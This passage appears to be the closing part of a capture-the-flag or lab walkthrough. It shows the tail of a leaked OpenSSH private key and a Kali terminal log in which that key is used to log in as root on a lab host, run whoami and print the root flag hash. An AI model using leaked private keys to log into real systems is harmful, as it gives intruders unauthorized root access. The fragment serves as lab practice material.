XvwuDAcKd1wxzdk1C2rX9BDLLxvAIde+GOLup9cc6kuFBQj7F6miqVXdVFgQ9RFL8jTaYI
8ZF1pbgmjzZd6PAAAAEHJvb3RAZmFjdG9yc3BhY2UBAg==
-----END OPENSSH PRIVATE KEY-----

                                                                                                                                             
┌──(root㉿kali2)-[~/Desktop]
└─# ssh root@192.168.56.138 -i id
Linux factorspace 5.10.0-21-amd64 #1 SMP Debian 5.10.162-1 (2023-01-21) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sat Mar 30 04:39:10 2024 from 192.168.56.104
root@factorspace:~# whoami
root
root@factorspace:~# cat /root/r*
052cf26a6e7e33790391c0d869e2e40c
root@factorspace:~#

烦